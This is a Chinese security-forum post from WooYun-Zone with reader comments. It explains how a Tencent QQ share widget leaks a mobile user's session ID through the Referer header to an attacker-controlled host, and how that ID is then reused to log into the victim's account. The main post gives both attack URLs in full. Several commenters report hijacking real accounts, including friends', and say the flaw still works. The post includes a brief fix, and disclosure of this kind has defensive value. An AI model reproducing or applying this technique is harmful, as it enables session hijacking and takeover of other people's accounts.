腾讯某处xss,直接获取用户登陆权限

  • A+
所属分类:WooYun-Zone

手机被偷,然后黑产牛给我发来了这个,简单分析了一下,公布以下原理。

仅供测试,请勿应用于现实生活,后果自负!

一、详细说明:

当手机用户访问:

http://connect.qq.com/widget/shareqq/index.html?url=http://host5681544d.kryptcloud.com/a.php&desc=&title=&summary=&pics=http://host5681544d.kryptcloud.com/a.php&flash=&sit&style=201&width=32&height=32

时会自动缓存网页作为图片

腾讯某处xss,直接获取用户登陆权限

但get访问时会带入 Sid, a.php可以使用 $_SERVER['HTTP_REFERER'] 获取到该Sid,从而导致用户权限可导致他人利用

二、漏洞证明:

腾讯某处xss,直接获取用户登陆权限

http://q32.3g.qq.com/g/s?sid=你获取的Sid&3G_UIN=123123&saveURL=0&new3gqq=true&aid=nqqchatMain

uin无需获取,3g登录会自动反填。

三、修复方案:

删掉get访问时的SID

用户自防:开启设备锁

  1. 1#

    pyphrb (fuck寂寞的瘦子) | 2016-01-25 18:08

    牛逼

  2. 2#

    by灰客 | 2016-01-25 18:10

    牛逼

  3. 3#

    tensor (花式撸管,撸出美好明天。) | 2016-01-25 18:30

    莫非 WooYun: 我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss) 就是楼主说的这个漏洞

  4. 4#

    李旭敏 (˿̖̗̀́̂̃̄̅̆̇̈̉̊̋̌̍̎̏̐̑̒̓̔̕) | 2016-01-25 18:35

    10分

  5. 5#

    todaro (学习装逼) | 2016-01-25 18:42

    有意思 @呆子不开口  深得您的姿势

  6. 6#

    隐形人真忙 (0 . 0) | 2016-01-25 18:45

    醉了

  7. 7#

    随风的风 (静,以修身:() | 2016-01-25 18:53

    卧槽

  8. 8#

    zhchbin | 2016-01-25 19:01

    居然还真有用sid登录的接口!!666666

  9. 9#

    sunrain (‮  ) | 2016-01-25 19:20

    666666

  10. 10#

    带我玩 | 2016-01-25 19:23

    感觉好牛逼

  11. 11#

    (慢慢的我,习惯了这种生活.) | 2016-01-25 19:28

    测试了下,果然好使…

  12. 12#

    船长 | 2016-01-25 19:41

    已经被黑产牛利用了

  13. 13#

    小杰哥 (能学则学,技多不压身。) | 2016-01-25 20:23

    修复了?

  14. 14#

    小杰哥 (能学则学,技多不压身。) | 2016-01-25 20:24

    貌似没 sid了 …

  15. 15#

    小杰哥 (能学则学,技多不压身。) | 2016-01-25 20:26

    666  测试成功了!

  16. 16#

    小杰哥 (能学则学,技多不压身。) | 2016-01-25 20:33

    只成功了一次  还是自己的 …

  17. 17#

    好基友一辈子 | 2016-01-25 20:48

    @小杰哥 我倒是成功拿到get的url了 但是没找到uid啊

  18. 18#

    whale | 2016-01-25 20:57

    已失效。。。

  19. 19#

    小杰哥 (能学则学,技多不压身。) | 2016-01-25 21:00

    @好基友一辈子 成功了  几个好友而已…  你登录上去 人家电脑版会提示别处登录

  20. 20#

    by灰客 | 2016-01-25 21:08

    @whale 造谣。测试仍有效。我想看看tx会留多久/tx

  21. 21#

    小杰哥 (能学则学,技多不压身。) | 2016-01-25 21:19

    @by灰客 +1   越打越多…  只不过 感觉sid有点随机  大多数连接都没有携带sid访问

  22. 22#

    半夏 (密码我已经忘记了) | 2016-01-25 21:27

    这已经修很多啦 以前一个sid什么都可以

  23. 23#

    Gnest (ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎) | 2016-01-25 21:31

    666

  24. 24#

    好基友一辈子 | 2016-01-25 21:32

    @小杰哥 sid在哪里

  25. 25#

    Gnest (ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎) | 2016-01-25 21:33

    @小杰哥 我杂测试失败了

  26. 26#

    火日攻天 | 2016-01-25 22:01

    部分成功了 部分失败了 原因不明 登录都失败了 这群人竟然都开了设备锁

  27. 27#

    车大炮 | 2016-01-25 22:37

    测试自己的成功了,然后现在测试又获取不到了,应该是修复了吧

  28. 28#

    by灰客 | 2016-01-25 22:41

    @车大炮 造谣。测试仍有效。我想看看tx会留多久/tx

  29. 29#
    感谢(1)

    奶权 | 2016-01-25 23:15

    这不是xss= =

  30. 30#

    zzzzy (我已然别无所求) | 2016-01-25 23:48

    看来是来晚了?  我这没测试成功 – -
    没看到sid…

    我这referer就是原链接…

  31. 31#

    by灰客 | 2016-01-26 00:29

    @奶权 这个叫啥- -我一直不知道他叫啥。。

  32. 32#

    by灰客 | 2016-01-26 00:30

    @zzzzy 造谣。测试仍有效。我想看看tx会留多久/tx
    注意一下满足的条件

  33. 33#

    zzzzy (我已然别无所求) | 2016-01-26 01:23

    @by灰客 啊 = =  没注意是手机用户访问….   在电脑上测试的…

  34. 34#

    围剿 (七月流火,八月未央,九月白露凝成轻霜) | 2016-01-26 08:06

    WooYun: QQ某处内嵌url可替换配合xss可做钓鱼\\盗取Cookie等

  35. 35#

    AK-47 | 2016-01-26 08:10

    666,打TX的脸呀

  36. 36#

    小杰哥 (能学则学,技多不压身。) | 2016-01-26 09:12

    没人公布… 点我看过程

  37. 37#

    無情 | 2016-01-26 09:45

    @小杰哥 生于:1997年10月

      真是感到惭愧至极。。

  38. 38#

    千机 | 2016-01-26 10:03

    竟然还没修复,,亲测有效

  39. 39#

    小杰哥 (能学则学,技多不压身。) | 2016-01-26 13:06

    @無情 别闹   等下00后出来吊打我!

  40. 40#

    呆子不开口 (求各种兼职) | 2016-01-26 14:36

    @todaro 点我的链接之父

  41. 41#

    风情万种 (很有味道…) | 2016-01-26 15:31

    其实没什么用  不用的ip使用sid会 失效 你们自己测试是因为在同一个ip下

  42. 42#

    h3hz | 2016-01-26 15:52

    这个sid怎么产生的,本地测试发现自己的get请求从来都不带sid

  43. 43#

    todaro (学习装逼) | 2016-01-26 16:50

    @呆子不开口 此话不虚!